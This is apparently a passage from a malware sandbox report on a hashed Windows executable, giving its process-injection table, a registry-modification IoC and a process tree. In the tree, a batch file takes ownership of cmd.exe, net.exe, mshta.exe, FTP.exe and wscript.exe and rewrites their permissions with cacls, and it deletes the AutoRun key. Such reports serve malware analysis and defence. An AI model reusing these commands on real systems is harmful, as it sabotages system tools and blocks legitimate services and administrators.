PID 2124 wrote to memory of 4984	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 5036	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 5036	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 5036	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 5036	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 5036	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 5036	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 5036	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 5036	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 5036	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 5036	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 1184 wrote to memory of 3920	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 3920	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 3920	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 4488	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 4488	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 4488	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 5112	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 5112	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 5112	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 5088	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 5088	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 5088	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 3596	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 3596	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 3596	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 4436	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 4436	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 4436	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 4668	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 4668	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 4668	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 4732	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 4732	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 4732	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 1012	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 1012	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 1012	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 1016	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 1016	1184	cmd.exe	cacls.exe
PID 1184 wrote to memory of 1016	1184	cmd.exe	cacls.exe
PID 5036 wrote to memory of 252	5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	cmd.exe
PID 5036 wrote to memory of 252	5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	cmd.exe
PID 5036 wrote to memory of 252	5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	cmd.exe
PID 5036 wrote to memory of 208	5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	cmd.exe
PID 5036 wrote to memory of 208	5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	cmd.exe
PID 5036 wrote to memory of 208	5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	cmd.exe
PID 5036 wrote to memory of 1608	5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	cmd.exe
PID 5036 wrote to memory of 1608	5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	cmd.exe
PID 5036 wrote to memory of 1608	5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	cmd.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

Processes:

22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
"C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Vahuygrzckill$-arab.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
3⤵
PID:4952

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cmd.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3920

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /g Administrators:f
3⤵
PID:4488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5112

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Users:r
3⤵
PID:5088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3596

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
3⤵
PID:4436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4668

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d SERVICE
3⤵
PID:4732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1012

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
3⤵
PID:1016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d "network service"
3⤵
PID:3852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4612

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g system:r
3⤵
PID:4688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3604

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
3⤵
PID:3052

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cmd.exe /a
3⤵
- Modifies file permissions
PID:744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:756

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
3⤵
PID:3188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4064

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
3⤵
PID:4044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4928

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
3⤵
PID:4988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4712

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
3⤵
PID:3960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4392

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
3⤵
PID:4700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4676

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
3⤵
PID:4576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:524

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
3⤵
PID:4460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2236

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
3⤵
PID:2428

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3868

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /g Administrators:f
3⤵
PID:2708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1432

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Users:r
3⤵
PID:4060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4860

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Administrators:r
3⤵
PID:2516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4948

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d SERVICE
3⤵
PID:4932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4940

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssqlserver
3⤵
PID:4128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4348

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d "network service"
3⤵
PID:3048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4872

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d system
3⤵
PID:4584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:5104

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
3⤵
PID:4984

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net.exe /a
3⤵
- Modifies file permissions
PID:2232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2884

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
3⤵
PID:2276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4464

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
3⤵
PID:4596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3732

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
3⤵
PID:324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4576

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
3⤵
PID:428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4724

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
3⤵
PID:2216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:920

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
3⤵
PID:1320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1360

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d system
3⤵
PID:4240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:304

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
3⤵
PID:2644

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net1.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2844

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /g Administrators:f
3⤵
PID:4292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4344

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Users:r
3⤵
PID:1412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4336

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Administrators:r
3⤵
PID:4332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3044

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d SERVICE
3⤵
PID:3076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4072

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssqlserver
3⤵
PID:4524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4232

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d "network service"
3⤵
PID:4888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4044

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d system
3⤵
PID:2612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:5012

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
3⤵
PID:4992

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net1.exe /a
3⤵
- Modifies file permissions
PID:5088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4572

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
3⤵
PID:4620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:588

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
3⤵
PID:384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:8

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
3⤵
PID:3300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2920

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
3⤵
PID:1828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2400

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
3⤵
PID:2564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4396

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
3⤵
PID:2036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2928

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d system
3⤵
PID:3848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1608

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
3⤵
PID:4760

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\mshta.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2228

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /g Administrators:f
3⤵
PID:4300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4920

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Users:r
3⤵
PID:744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3740

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
3⤵
PID:756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2640

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d SERVICE
3⤵
PID:4120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:280

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
3⤵
PID:1584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4164

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d "network service"
3⤵
PID:4968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4428

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d system
3⤵
PID:4736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4600

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
3⤵
PID:4704

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\mshta.exe /a
3⤵
- Modifies file permissions
PID:4368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:508

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
3⤵
PID:4812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4944

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
3⤵
PID:3168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1684

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
3⤵
PID:860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4900

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
3⤵
PID:3952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:252

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
3⤵
PID:1796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2176

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
3⤵
PID:2692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1980

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d system
3⤵
PID:3320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1400

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
3⤵
PID:4960

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\FTP.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4500

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /g Administrators:f
3⤵
PID:3260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3992

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Users:r
3⤵
PID:3628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:256

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
3⤵
PID:4024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1008

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d SERVICE
3⤵
PID:2124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3524

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
3⤵
PID:1872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:5112

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d "network service"
3⤵
PID:4748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4464

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d system
3⤵
PID:4596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:680

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
3⤵
PID:648

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\FTP.exe /a
3⤵
- Modifies file permissions
PID:524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1928

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
3⤵
PID:1296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2204

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
3⤵
PID:4768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1572

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
3⤵
PID:2664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4832

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
3⤵
PID:1880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3608

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
3⤵
PID:856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4852

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
3⤵
PID:4688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1524

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d system
3⤵
PID:2224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1412

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
3⤵
PID:4940

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\wscript.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4004

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /g Administrators:f
3⤵
PID:4924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4064

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Users:r
3⤵
PID:1560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4984

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
3⤵
PID:924

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d SERVICE
3⤵
PID:4044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3912

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
3⤵
PID:3524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
